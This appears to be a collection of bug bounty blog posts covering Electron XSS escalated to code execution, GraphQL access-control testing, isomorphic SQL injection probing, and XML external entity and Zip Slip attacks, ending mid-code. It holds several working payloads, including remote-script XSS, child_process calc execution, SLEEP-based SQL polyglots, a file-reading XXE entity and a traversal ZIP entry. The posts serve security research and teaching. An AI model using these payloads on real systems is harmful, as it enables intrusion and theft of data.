It's Node's World – We Just Live In It

For better or worse, Node.js has rocketed up the developer popularity charts. Thanks to frameworks like React, React Native, and Electron, developers can easily build clients for mobile and native platforms. These clients are delivered in what are essentially thin wrappers around a single JavaScript file.

As with any modern convenience, there are tradeoffs. On the security side of things, moving routing and templating logic to the client side makes it easier for attackers to discover unused API endpoints, unobfuscated secrets, and more. Check out Webpack Exploder, a tool I wrote that decompiles Webpacked React applications into their original source code.

Electron applications are even easier to decompile and debug than truly native desktop binaries. Instead of wading through heaps of assembly code in Ghidra, Radare2, or IDA, attackers can use Electron's built-in Chromium DevTools. Meanwhile, Electron's documentation recommends packaging applications into asar archives, a tar-like format that can be unpacked with a simple one-liner.

With the source code, attackers can search for client-side vulnerabilities and escalate them to code execution. No funky buffer overflows needed – Electron's nodeIntegration setting puts applications one XSS away from popping calc.

The dangers of XSS in an Electron app, as demonstrated by Jasmin Landry.

I love the whitebox approach to testing applications. If you know what you are looking for, you can zoom into weak points and follow your exploit as it passes through the code.

This blog post will go through my whitebox review of an unnamed Electron application from a bug bounty program. I will demonstrate how I escalated an open redirect into remote code execution with the help of some debugging. Code samples have been modified and anonymized.

From Whitebox to Exploit

My journey began one day when I spotted Jasmin's tweet and was inspired to do some Electron hacking myself. I began by installing the application on macOS, then retrieved the source code:

  1. Browse to the Application folder.
  2. Right-click the application and select Show Package Contents.
  3. Enter the Contents directory that contains an app.asar file.
  4. Run npx asar extract app.asar source (Node should be installed).
  5. View the decompiled source code in the new source directory!

Discovering Vulnerable Config

Peeking into package.json, I found the configuration "main": "app/index.js", telling me that the main process was initiated from the index.js file. A quick check of index.js confirmed that nodeIntegration was set to true for most of the BrowserWindow instances. This meant that I could easily escalate attacker-controlled JavaScript to native code execution. When nodeIntegration is true, JavaScript in the window can access native Node.js functions such as require and thus import dangerous modules like child_process. This leads to the classic Electron calc payload require('child_process').execFile('/Applications/',function(){}).

Attempting XSS

So now all I had to do was find an XSS vector. The application was a cross-platform collaboration tool (think Slack or Zoom), so there were plenty of inputs like text messages or shared uploads. I launched the app from the source code with electron . --proxy-server=<host:port>, proxying web traffic through Burp Suite.

I began testing HTML payloads like <b>pwned</b> in each of the inputs. Not long after, I got my first pwned! This was a promising sign. However, standard XSS payloads like <script>alert()</script> or <svg onload=alert()> simply failed to execute. I needed to start debugging.

Bypassing CSP

By default, you can access DevTools in Electron applications with the keyboard shortcut Ctrl+Shift+I or the F12 key. I mashed the keys but nothing happened. It appeared that the application had removed the default keyboard shortcuts. To solve this mystery, I searched for globalShortcut (Electron's keyboard shortcut module) in the source code. One result popped up:

electron.globalShortcut.register('CommandOrControl+H', () => {

Aha! The application had its own custom keyboard shortcut to open a secret menu. I entered CMD+H and a Developer menu appeared in the menu bar. It contained a number of juicy items like Update and Callback, but most importantly, it had DevTools! I opened DevTools and resumed testing my XSS payloads. It soon became clear why they were failing – an error message popped up in the DevTools console complaining about a Content Security Policy (CSP) violation. The application itself was loading a URL with the following CSP:

Content-Security-Policy: script-src 'self' 'unsafe-eval' https://* https://*

The CSP excluded the unsafe-inline policy, blocking event handlers like the svg payload. Furthermore, since my payloads were injected dynamically into the page using JavaScript, typical <script> tags failed to execute. Fortunately, the CSP had one fatal error: it allowed wildcard URLs. In particular, the https://* policy allowed me to include scripts from my own S3 bucket! To inject and execute a script tag dynamically, I used a trick I learned from Intigriti's Easter XSS challenge which used iframe's srcdoc attribute:

<iframe srcdoc='<script src=></script>'></iframe>

(I anonymized the source URL.)

With that, I got my lovely alert box! Adrenaline pumping, I modified evilscript.js to window.require('child_process').execFile('/Applications/',function(){}), re-sent the XSS payload, and... nothing.

We need to go deeper.

The Room of Requirement

Heading back to the DevTools console, I noticed the following error: Uncaught TypeError: window.require is not a function. This was perplexing, because when nodeIntegration is set to true, Node.js functions like require should be included in window. Going back to the source code, I noticed these lines of code when creating the vulnerable BrowserWindow:

const appWindow = createWindow('main', {
            width: 1080,
            height: 660,
            webPreferences: {
                nodeIntegration: true,
                preload: path.join(__dirname, 'preload.js')
            }
        });

Looking into preload.js:

window.nodeRequire = require;
delete window.require;
delete window.exports;
delete window.module;

Aha! The application was renaming and deleting require in the preload sequence. This wasn't an attempt at security by obscurity; it's boilerplate code from the Electron documentation to get third-party JavaScript libraries like AngularJS to work! As I've mentioned previously, insecure configuration is a consistent theme among vulnerable applications. By turning on nodeIntegration and re-introducing require into the window, code execution becomes a significant possibility.

With one more tweak (using window.parent.nodeRequire since I was executing my XSS from an iframe), I sent off my new payload, and got my calc!

Drive-By Code Execution

Before I looked at the native application, I found an open redirect in the web application. However, the triager asked me to demonstrate additional impact. One feature of the native application was that it could open a new window from a web link in the browser.

Consider applications like Slack and Zoom. Have you ever wondered how clicking a meeting link in your browser prompts you to open the Zoom application?

Zoom Prompt

That's because these websites are trying to open custom URL schemes that have been registered by the native application. For example, Zoom registers the zoommtg custom URL scheme with your operating system, so that if you have Zoom installed and try to open zoommtg:// in your browser (try it!), you will be prompted to open the native application. In some less-secure browsers, you won't even be prompted at all!

I noticed that the vulnerable application had a similar function. It would open a collaboration room in the native application if I visited a page on the website. Digging into the code, I found this handler:

function isWhitelistedDomain(url) {
    var allowed = ['']; // whitelisted domain anonymized
    var test = extractDomain(url);

    if( allowed.indexOf(test) > -1 ) {
        return true;
    }

    return false;
}

let launchURL = parseLaunchURL(fullURL);

if (isWhitelistedDomain(launchURL)) {
    // load launchURL in the application window
} else {
    // reject the launch URL
}
Let's break this down. When the native application is launched from a custom URL scheme (in this case, collabapp://), the URL is passed into the launch handler. The launch handler extracts the URL after collabapp://, checks that the extracted URL's domain is on the whitelist, and loads the URL in the application window if it passes the check.

While the whitelist-checking code itself is correct, the security mechanism is incredibly fragile. So long as there is a single open redirect on the whitelisted domain, an attacker could force the native application to load an arbitrary URL in the application window. Combine that with the nodeIntegration vulnerability, and all you need is a redirect to an evil page that calls window.parent.nodeRequire(...) to get code execution!
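To make the fragility concrete, here is a runnable sketch of the check. The domain names and the extractDomain helper are hypothetical stand-ins for the anonymized application:

```javascript
// Hypothetical stand-in for the application's domain extraction logic.
function extractDomain(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

function isWhitelistedDomain(url) {
  const allowed = ['collab.example.com']; // placeholder for the real domain
  return allowed.includes(extractDomain(url));
}

// The check only inspects the URL the app is told to load...
isWhitelistedDomain('https://collab.example.com/rooms/1');
// ...so a whitelisted URL that *redirects* elsewhere still passes:
isWhitelistedDomain('https://collab.example.com/redirect?url=https://evil.example/evil.html');
// Only a directly attacker-controlled URL is rejected:
isWhitelistedDomain('https://evil.example/evil.html');
```

The check never follows the redirect, so any open redirect on the whitelisted host defeats it.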

My final payload was a collabapp:// link wrapping the open redirect, which bounced the application window to my evil.html. On evil.html, I simply ran window.parent.nodeRequire('child_process').execFile('/Applications/',function(){}).

Now, if the victim user visits any webpage that loads the evil custom URL scheme, calculator pops! Drive-by code execution without the browser zero-days.

This is the World We Live In

As new applications flourish in the wake of the COVID-19 pandemic, developers might be tempted to take shortcuts that could lead to devastating security holes. These vulnerabilities cannot be fixed quickly because they are caused by mistakes early on in the development cycle.

Think back to the nodeIntegration and preload issues with the vulnerable application – the application will always remain brittle and vulnerable unless these architectural and configuration issues are fixed. Even if they patch one XSS or open redirect, any new instance of those bugs will lead to code execution. At the same time, turning nodeIntegration off would break the entire application, which would need to be rewritten from that point onwards.

Node.js frameworks like Electron allow for developers to rapidly build native applications using languages and tools they are familiar with. However, the userland is a vastly different threat landscape; popping alert in your browser is very different from popping calc in your application. Developers and users should tread carefully.

This article was originally posted on my company's Medium blog. If you'd like to support me, give a clap and follow my Medium profile!


GraphQL is a modern query language for Application Programming Interfaces (APIs). Supported by Facebook and the GraphQL Foundation, GraphQL grew quickly and has entered the early majority phase of the technology adoption cycle, with major industry players like Shopify, GitHub and Amazon coming on board.

Innovation Adoption Lifecycle

As with the rise of any new technology, using GraphQL came with growing pains, especially for developers who were implementing GraphQL for the first time. While GraphQL promised greater flexibility and power over traditional REST APIs, GraphQL could potentially increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities.

With a REST API, clients make HTTP requests to individual endpoints.

For example:

  • GET /api/user/1: Get user 1
  • POST /api/user: Create a user
  • PUT /api/user/1: Edit user 1
  • DELETE /api/user/1: Delete user 1

GraphQL replaces the standard REST API paradigm. Instead, GraphQL specifies only one endpoint to which clients send either query or mutation request types. These perform read and write operations respectively. A third request type, subscriptions, was introduced later but has been used far less often.
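As a sketch with hypothetical field names, a read and a write against the same /graphql endpoint might look like this:

```graphql
# Read (query): fetch a user's name
query GetUser {
  user(id: 1) {
    name
  }
}

# Write (mutation): update the same user
mutation RenameUser {
  updateUser(id: 1, name: "New Name") {
    id
    name
  }
}
```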

On the backend, developers define a GraphQL schema that includes object types and fields to represent different resources.

For example, a user would be defined as:

type User {
  id: ID!
  name: String!
  email: String!
  height(unit: LengthUnit = METER): Float
  friends: [User!]!
  status: Status!
}

enum LengthUnit {
  METER
  FOOT
}

enum Status {
  ONLINE
  OFFLINE
}
This simple example demonstrates several powerful features of GraphQL. It supports a list of other object types (friends), variables (unit), and enums (status). In addition, developers write resolvers, which define how the backend fetches results from the database for a GraphQL request.

To illustrate this, let’s assume that a developer has defined the following query in the schema:

{
  "name": "getUser",
  "description": null,
  "args": [
    {
      "name": "id",
      "description": null,
      "type": {
        "kind": "SCALAR",
        "name": "ID",
        "ofType": null
      },
      "defaultValue": null
    }
  ],
  "type": {
    "kind": "OBJECT",
    "name": "User",
    "ofType": null
  },
  "isDeprecated": false,
  "deprecationReason": null
}

On the client side, a user would make the getUser query and retrieve the name and email fields through the following POST request:

POST /graphql
Content-Type: application/json

{"query":"query getUser($id:ID!) { getUser(id:$id) { name email }}","variables":{"id":1},"operationName":"getUser"}

On the backend, the GraphQL layer would parse the request and pass it to the matching resolver:

Query: {
  user(obj, args, context, info) {
    return context.db.loadUserByID(args.id).then(
      userData => new User(userData)
    );
  }
}
Here, args refers to the arguments provided to the field in the GraphQL query. In this case, args.id is 1.

Finally, the requested data would be returned to the client:

{
  "data": {
    "user": {
      "name": "John Doe",
      "email": ""
    }
  }
}
You may have noticed that the User object type also includes the friends field, which references other User objects. Clients can use this to query other fields on related User objects.

POST /graphql
Content-Type: application/json

{"query":"query getUser($id:ID!) { getUser(id:$id) { name email friends { email }}}","variables":{"id":1},"operationName":"getUser"}

Thus, instead of manually defining individual API endpoints and controller functions, developers can leverage the flexibility of GraphQL to craft complex queries on the client side without having to modify the backend. This makes GraphQL popular with serverless implementations like Apollo Server with AWS Lambda.

Trouble in Paradise

Remember the familiar line — with great power comes great responsibility? While GraphQL’s flexibility is a strong advantage, it can be abused to exploit access control and information disclosure vulnerabilities.

Consider the simple User object type and query. You might reasonably expect that a user can query the email of their friends. But what about the email of their friends' friends? Absent proper authorisation checks, an attacker could easily obtain the emails of second-degree and third-degree connections using the following:

query Users($id: ID!) {
  user(id: $id) {
    friends {
      friends {
        friends {
          email
        }
      }
    }
  }
}
In the classic REST paradigm, developers implement access controls for each individual controller or model hook. While potentially violating the Don’t Repeat Yourself (DRY) principle, this gives developers greater control over each call’s access controls.

GraphQL advises developers to delegate authorisation to the business logic layer rather than the GraphQL layer.

Business Logic Layer diagram, from the GraphQL documentation.

As such, the authorisation logic sits below the GraphQL resolver. For instance, in this sample from GraphQL:

// Authorization logic lives inside postRepository
var postRepository = require('postRepository');

var postType = new GraphQLObjectType({
  name: 'Post',
  fields: {
    body: {
      type: GraphQLString,
      resolve: (post, args, context, { rootValue }) => {
        return postRepository.getBody(context.user, post);
      }
    }
  }
});
postRepository.getBody validates access controls in the business logic layer.

However, this isn’t enforced by the GraphQL specification. GraphQL recognises that it may be “tempting” for developers to place the authorisation logic incorrectly in the GraphQL layer. Unfortunately, developers fall into this trap far too often, creating holes in the access control layer.

Thinking in Graphs

So how should security researchers approach a GraphQL API? GraphQL recommends that developers “think in graphs” when modelling their data, and researchers should do the same. We can draw parallels to what I call “second-order Insecure Direct Object References (IDORs)” in the classic REST paradigm.

For example, in a REST API, while the following API call may be properly protected:

GET /api/user/1

A “second-order” API call may not be adequately protected:

GET /api/user/1/photo/6

The backend logic may have validated that the user requesting user number 1 has read permissions for that user. However, it failed to check whether they should also have access to photo number 6.
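A minimal sketch of the missing second-order check, with an entirely hypothetical data model:

```javascript
// Toy in-memory "database" (hypothetical).
const photos = { 6: { id: 6, ownerId: 2 } };

function canReadPhoto(requestingUserId, targetUserId, photoId) {
  const photo = photos[photoId];
  if (!photo) return false;
  // First-order check (elided): may requestingUserId read targetUserId at all?
  // Second-order check that is often forgotten: does the photo in the URL
  // actually belong to the user in the URL?
  return photo.ownerId === targetUserId;
}

canReadPhoto(1, 1, 6); // photo 6 belongs to user 2, so this request is rejected
```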

The same applies to GraphQL calls, except that with a graph schema, the number of possible paths increases exponentially. Take a social media photo for example: What if an attacker queries the users who have liked a photo, and in turn accesses their photos?

query Users($id: ID!) {
  user(id: $id) {
    photos {
      likes {
        user {
          photos {
            url
          }
        }
      }
    }
  }
}
What about the likes on those photos? The chain continues. In short, a security researcher should seek to “close the loop” in the graph and find paths towards their target object. Dominic Couture from GitLab explains this comprehensively in his post about his graphql-path-enum tool.
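The path-enumeration idea can be sketched in a few lines. This toy version (not graphql-path-enum itself) walks a simplified schema, represented as a map from type names to their fields' result types:

```javascript
// Toy path enumeration in the spirit of graphql-path-enum.
// Hypothetical schema shape: { TypeName: { fieldName: resultTypeName } }.
function findPaths(schema, start, target, path = [start], seen = new Set([start])) {
  if (start === target) return [path.join(' -> ')];
  const paths = [];
  for (const [field, type] of Object.entries(schema[start] ?? {})) {
    if (seen.has(type)) continue; // avoid cycles in the graph
    paths.push(...findPaths(schema, type, target,
      [...path, `(${field}) ${type}`], new Set([...seen, type])));
  }
  return paths;
}

const schema = {
  Query: { user: 'User' },
  User: { photos: 'Photo', friends: 'User' },
  Photo: { likes: 'Like' },
  Like: { user: 'User' },
};

findPaths(schema, 'Query', 'Photo');
// -> [ 'Query -> (user) User -> (photos) Photo' ]
```

Each returned path corresponds to a nested query an attacker could attempt, exactly like the tool's output below.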

Let’s Get Down to Business

In most implementations of GraphQL APIs, you should be able to quickly identify the GraphQL endpoint because they tend to be simply /graphql or /graph. You can also identify them based on the requests made to these endpoints.

POST /graphql
Content-Type: application/json

{"query": "query AllUsers { allUsers{ id } }"}

You should look out for key words like query and mutation. In addition, some GraphQL implementations use GET requests that look like this: GET /graphql?query=….

Once you’ve identified the endpoint, you should extract the GraphQL schema. Thankfully, the GraphQL specification supports "introspection" queries that return the entire schema. This allows developers to quickly build and debug GraphQL queries. These introspection queries perform a similar function to API documentation tools, such as Swagger, for REST APIs.

We can adapt the introspection query from this gist:

query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
      name
      description
      args {
        ...InputValue
      }
      locations
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
      }
    }
  }
}
Of course, you will have to encode this for the method that the call is made with. To match the standard POST /graphql JSON format, use:

POST /graphql
Content-Type: application/json

{"query": "query IntrospectionQuery {__schema {queryType { name },mutationType { name },subscriptionType { name },types {...FullType},directives {name,description,args {...InputValue},locations}}}\nfragment FullType on __Type {kind,name,description,fields(includeDeprecated: true) {name,description,args {...InputValue},type {...TypeRef},isDeprecated,deprecationReason},inputFields {...InputValue},interfaces {...TypeRef},enumValues(includeDeprecated: true) {name,description,isDeprecated,deprecationReason},possibleTypes {...TypeRef}}\nfragment InputValue on __InputValue {name,description,type { ...TypeRef },defaultValue}\nfragment TypeRef on __Type {kind,name,ofType {kind,name,ofType {kind,name,ofType {kind,name}}}}"}

Hopefully, this will return the entire schema so you can begin hunting for different paths to your desired object type. Several GraphQL frameworks, such as Apollo, acknowledge the dangers of exposing introspection queries and have disabled them in production by default. In such cases, you will have to feel your way forward by patiently brute-forcing and enumerating possible object types and fields. For Apollo, the server helpfully returns Error: Unknown type “X”. Did you mean “Y”? for a type or field that’s close to the actual value.

Security researchers should uncover as much of the original schema as possible. If you have the full schema, feel free to run it through tools like graphql-path-enum to enumerate different paths from one query to a target object type. In the example given by graphql-path-enum, if the target object type in a schema is Skill, the researcher should run:

$ graphql-path-enum -i ./schema.json -t Skill
Found 27 ways to reach the "Skill" node from the "Query" node:
 - Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill

The results return different paths in the schema to reach Skill objects through nested queries and linked object types.

Security researchers should also go through the schema manually to discover paths that graphql-path-enum might have missed. Since the tool requires a GraphQL schema to work, researchers who are unable to extract the full schema will also have to rely on manual inspection. To do this, consider the various object types the attacker has access to, find their linked object types, and follow these links to the protected resource. Next, test these queries for access control issues.

For mutations, the approach is similar. Beyond testing for direct access control issues (mutations on objects you should not have access to), you will need to check the return values of mutations for linked object types.
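For example, against a hypothetical schema, even a mutation the attacker is allowed to call can leak protected fields through the linked objects in its return value:

```graphql
mutation LikePhoto {
  likePhoto(photoId: 6) {
    photo {
      likes {
        user {
          email    # protected data reached via the mutation's return value
        }
      }
    }
  }
}
```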


GraphQL adds greater flexibility and depth to APIs by querying objects through the graph paradigm. However, it is not a panacea for access control vulnerabilities. GraphQL APIs are prone to the same authorisation and authentication issues that affect REST APIs. Additionally, its access controls still depend on developers to define appropriate business logic or model hooks, increasing the potential for human errors.

Developers should move their access controls as close to the persistence (model) layer as possible, and when in doubt, rely on frameworks with sane defaults like Apollo. In particular, Apollo recommends performing authorisation checks in data models:

Since the very beginning, we’ve recommended moving the actual data fetching and transformation logic from resolvers to centralized Model objects that each represent a concept from your application: User, Post, etc. This allows you to make your resolvers a thin routing layer, and put all of your business logic in one place.

For instance, the model for User would look like this:

export const generateUserModel = ({ user }) => ({
  getAll: () => {
    if (!user || !user.roles.includes('admin')) return null;
    return fetch('');
  },
});
By moving the authorisation logic to the model layer instead of spreading it across different controllers, developers can define a single “source of truth”.

In the long run, as GraphQL enjoys even greater adoption and reaches the late majority stage of the technology adoption cycle, more developers will implement GraphQL for the first time. Developers must carefully consider the attack surface of their GraphQL schemas and implement secure access controls to protect user data.

Further Reading

Special thanks to Dominic Couture, Kenneth Tan, Medha Lim, Serene Chan, and Teck Chung Khor for their inputs.

#infosec #graphql #appsec #programming


Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities.

Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response.

For SQL injections, the best case scenario is that you get a verbose stack trace that tells you exactly what you need:

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8

<div id="error">
    <h1>Database Error</h1>
    <div class='message'>
        SQL syntax error near '''' where id=123' at line 1: update common_member SET name=''' where id=123
    </div>
</div>

If you see this, it's your lucky day. More often, however, you will either get a generic error message, or worse, no error at all – only an empty response.

HTTP/1.1 200 OK
Content-Type: application/json

{
    "users": []
}

As such, hunting SQL injections can be arduous and time-consuming. Many researchers prefer to do a single pass with automated tools like sqlmap and call it a day. However, running these tools without specific configurations is a blunt instrument that is easily detected and blocked by Web Application Firewalls (WAF). Furthermore, SQL injections occur in unique contexts; you might be injecting after a WHERE or LIKE or ORDER BY and each context requires a different kind of injection. This is even before various sanitization steps are applied.

Polyglots help researchers use a more targeted approach. However, polyglots, by their very definition, try to execute in multiple contexts at once, often sacrificing stealth and succinctness. Take for example the SQLi Polyglots from Seclists:

SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

Any half-decent WAF would pick up on these payloads and block them.

In real-world scenarios, researchers need to balance two concerns when searching for SQL injections:

  1. Ability to execute and thus identify injections in multiple contexts
  2. Ability to bypass WAFs and sanitization steps

A researcher can resolve this efficiently with something I call Isomorphic SQL Statements (although I'm sure other researchers have different names for it).

Incremental Approaches to Discovering Vulnerabilities

Going back to the XSS analogy, while XSS scanners and fuzzing lists are a dime a dozen, they usually don't work too well due to the aforementioned WAF blocking and unique contexts. Recently, more advanced approaches to automated vulnerability discovery have emerged that try to address the downsides of brute-force scanning, like James Kettle's Backslash Powered Scanning. As Kettle writes,

Rather than scanning for vulnerabilities, we need to scan for interesting behaviour.

In turn, automation pipeline tools like Ameen Mali's qsfuzz and Project Discovery's nuclei test against defined heuristic rules (“interesting behaviour”) rather than blindly bruteforcing payloads. This is the path forward for large-scale vulnerability scanning as more organizations adopt WAFs and better development practices.

For example, when testing for an XSS, instead of asking “does an alert box pop when I put in this payload?”, I prefer to ask “does this application sanitize single quotes? How about angle brackets?” The plus side of this is that you can easily automate this on a large scale without triggering all but the most sensitive WAFs. You can then follow up with manual exploitation for each unique context.

The same goes for SQL injections. But how do you formulate your tests without any feedback mechanisms? Remember that SQL injections differ from XSS in that usually no (positive) response is given. Nevertheless, one thing I've learned from researchers like Ian Bouchard is that even no news is good news.

This is where Isomorphic SQL Statements come into play. Applied here, isomorphic simply means SQL statements that are written differently but theoretically should return the same output. However, the difference is that you will be testing SQL statements which include special characters like ' or -. If the characters are properly escaped, the injected SQL statement will fail to evaluate to the same result as the original. If they aren't properly escaped, you'll get the same result, which indicates an SQL injection is possible.

Let's illustrate this with a simple toy SQL injection:

CREATE TABLE Users (
    ID int key auto_increment,
    LastName varchar(255),
    FirstName varchar(255),
    Address varchar(255),
    City varchar(255)
);

INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Bird', 'Big', '123 Sesame Street', 'New York City');

INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Monster', 'Cookie', '123 Sesame Street', 'New York City');


If you are fuzzing with a large list of SQL polyglots, it would be relatively trivial to pick up the injection, but in reality the picture will be complicated by WAFs, sanitization, and more complex statements.

Next, consider the following statements:

SELECT FirstName FROM Users WHERE ID = 1;
SELECT FirstName FROM Users WHERE ID = 2-1;
SELECT FirstName FROM Users WHERE ID = 1+'';

They should all evaluate to the same result if the special characters in the last two statements are injected unsanitized. If they don't evaluate to the same results, the server is sanitizing them in some way.

DB Fiddle

Now consider a common version of a search query, SELECT Address FROM Users WHERE FirstName LIKE '%<USER INPUT>%' ORDER BY Address DESC;:

SELECT Address FROM Users WHERE FirstName LIKE '%Big%' ORDER BY Address DESC;
SELECT Address FROM Users WHERE FirstName LIKE '%Big%%%' ORDER BY Address DESC;
SELECT Address FROM Users WHERE FirstName LIKE '%Big%' '' ORDER BY Address DESC;

Simply by injecting the same special character % twice in the second statement, receiving an identical response back gives you a clue about the actual SQL statement you are injecting into (you're injecting after a LIKE operator).

Even better, as Arne Swinnen noted way back in 2013 (a pioneer!):

Strings: split a valid parameter’s string value in two parts, and add an SQL string concat directive in between. An identical response for both requests would again give you reason to believe you have just hit an SQL injection.

We can achieve the same isomorphic effect for strings as numeric IDs simply by adding ' ' to our injection in the third statement. This is interpreted as concatenating the original string with a blank string, which should also return the same response while indicating that ' isn't being properly escaped.

From here, it is a simple matter of experimenting incrementally. You thus achieve two objectives:

  1. Discover which injectable characters are entered unsanitized into the final SQL statement
  2. Discover the original SQL statement you are injecting into

Mass Automation and Caveats

The goal is not only to discover individual SQL injections, but to automate the technique across large numbers of URLs and inputs. Traditional SQL injection payload lists or scanners make large-scale scanning noisy and resource-intensive. With the incremental isomorphic approach, you apply a heuristic rule like:

if (response of id_input) === (response of id_input + "+''"):
    return true
else:
    return false

This is much lighter and faster. Of course, while you gain in terms of fewer false negatives (e.g. polyglots that work but are blocked by WAFs), you lose in terms of more false positives. For example, there are cases where the backend simply trims all non-numeric characters before entering an SQL statement, in which case the above isomorphic statement would still succeed. Thus, rather than relying on a single isomorphic statement (binary signal), you will want to watch for multiple isomorphic statements succeeding (spectrum signal).
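The heuristic, including the spectrum signal, can be sketched as follows. This is a hypothetical illustration: `fetch()` stands in for an HTTP request to a target parameter, simulated here with a deliberately injectable SQLite query so the example is self-contained.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (ID INTEGER, FirstName TEXT)")
conn.execute("INSERT INTO Users VALUES (1, 'Cookie')")

def fetch(user_input):
    # Simulated vulnerable backend: input is interpolated straight into the query.
    return conn.execute(
        f"SELECT FirstName FROM Users WHERE ID = {user_input}"
    ).fetchall()

def looks_injectable(fetch, value):
    baseline = fetch(value)
    # Spectrum signal: require several isomorphic probes to agree, not just one,
    # to reduce false positives from e.g. backends that strip non-numeric chars.
    probes = [f"{value}+''", f"{int(value)+1}-1", f"{value}-0"]
    return all(fetch(p) == baseline for p in probes)

print(looks_injectable(fetch, "1"))
```

Against a real target, `fetch()` would issue the HTTP request and return a normalized response body.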

Although SQL injections are getting rarer, I've still come across them occasionally in manual tests. A mass scanning approach will yield even better results.

XML and ZIP – A Tale as Old As Time

While researching a bug bounty target, I came across a web application that processed a custom file type. Let's call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.

This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:

Archive:  Document.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
  inflating: word/settings.xml       
  inflating: docProps/core.xml       
  inflating: word/fontTable.xml      
  inflating: word/webSettings.xml    
  inflating: word/styles.xml         
  inflating: docProps/app.xml        

Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.

However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.

Here's a quick overview of these “vulnerable features.”

XML External Entities

The XML file format supports external entities, which allow an XML file to pull data from other sources, such as local or remote files. In some cases this can be useful because it makes importing data from various sources more convenient. However, in cases where an XML parser accepts user-defined inputs, a malicious user can pull data from sensitive local files or internal network hosts.

As the OWASP Foundation wiki states:

This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser... Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use.

Just like in my previous Remote Code Execution writeup, developers are put at risk by vulnerable defaults.
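As a contrast to those permissive Java defaults, here's a sketch showing how Python's stdlib parser (expat-based) refuses to resolve an external entity reference out of the box. The manifest structure mirrors the example used later in this post.

```python
import xml.etree.ElementTree as ET

# A classic file-disclosure XXE payload.
payload = """<?xml version="1.0"?>
<!DOCTYPE package [<!ENTITY xxe SYSTEM "file:///etc/hosts">]>
<package><title>My Awesome Package&xxe;</title></package>"""

try:
    ET.fromstring(payload)
    print("entity resolved")
except ET.ParseError as e:
    # ElementTree does not fetch external entities, so the reference is undefined.
    print("rejected:", e)
```

A weakly configured Java parser would instead fetch `/etc/hosts` and splice it into the document.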

ZIP Directory Traversal

Although ZIP directory traversal has been exploited since the format's inception, this attack vector gained prominence in 2018 due to Snyk's clumsily-named “Zip Slip” research/marketing campaign that found the vulnerability in many popular ZIP parser libraries.

An attacker can exploit this vulnerability with a ZIP file that contains directory traversal filenames such as ../../../../evil1/evil2/. When a vulnerable ZIP library unzips this file, rather than extracting to a temporary directory, it writes to another location in the filesystem defined by the attacker (in this case, /evil1/evil2). This can easily lead to remote code execution if an attacker overwrites a cron job script or creates a web shell in the web root directory.
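Both the malicious archive and the defense can be sketched in a few lines. The entry name and destination path below are illustrative; the guard rejects any entry whose resolved path escapes the extraction directory.

```python
import io
import os
import zipfile

# Build a "Zip Slip" archive in memory with a traversal entry name.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("../../../../evil1/evil2/shell.jsp", "<%-- evil --%>")

def safe_members(zf, dest):
    dest = os.path.realpath(dest)
    for info in zf.infolist():
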